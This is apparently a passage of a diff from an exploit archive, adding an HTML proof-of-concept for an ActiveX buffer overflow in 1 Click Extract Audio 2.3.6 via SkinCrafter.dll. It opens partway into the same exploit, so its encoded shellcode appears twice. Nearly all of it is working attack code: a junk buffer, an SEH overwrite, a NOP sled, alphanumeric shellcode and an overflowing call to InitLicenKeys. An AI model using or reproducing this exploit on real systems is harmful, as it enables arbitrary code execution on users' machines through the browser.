 "\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
 "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
 "\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
 "\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
 "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
 "\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
 "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
 "\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
 "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
 "\x4e\x46\x43\x36\x42\x50\x5a");
 junk2 = "";
 while(junk2.length < 2048) junk2+="B";
 payload = junk1 + nseh + seh + nops+ shellcode + junk2;
 arg1=payload;
 arg1=arg1;
 arg2="defaultV";
 arg3="defaultV";
 arg4="defaultV";
 arg5="defaultV";
 target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
 </script>
 </html>
--- a/platforms/windows/local/37212.html
+++ b/platforms/windows/local/37212.html
@ -0,0 +1,53 @@
 <html>
 <br>1 Click Extract Audio Activex Buffer Overflow</br>
 <br>Affected version=2.3.6</br>
 <br>Vendor Homepage:http://www.dvdvideotool.com/index.htm</br>
 <br>Software Link:www.dvdvideotool.com/1ClickExtractAudio.exe</br>
 <br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br>
 <br>SkinCrafter.dll version.1.9.2.0</br>
 <br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
 <br>Author: metacom</br>
 <!--Video Poc: http://bit.ly/1SYwV3u -->
 <object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
 <script >
 junk1 = "";
 while(junk1.length < 2048) junk1+="A";
 nseh = "\xeb\x06\xff\xff";
 seh = "\x58\xE4\x04\x10";
 nops= "";
 while(nops.length < 50) nops+="\x90";
 shellcode =(
 "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
 "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
 "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
 "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
 "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
 "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
 "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
 "\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
 "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
 "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
 "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
 "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
 "\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
 "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
 "\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
 "\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
 "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
 "\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
 "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
 "\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
 "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
 "\x4e\x46\x43\x36\x42\x50\x5a");
 junk2 = "";
 while(junk2.length < 2048) junk2+="B";
 payload = junk1 + nseh + seh + nops+ shellcode + junk2;
 arg1=payload;
 arg1=arg1;
 arg2="defaultV";
 arg3="defaultV";
 arg4="defaultV";
 arg5="defaultV";
 target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
 </script>
 </html>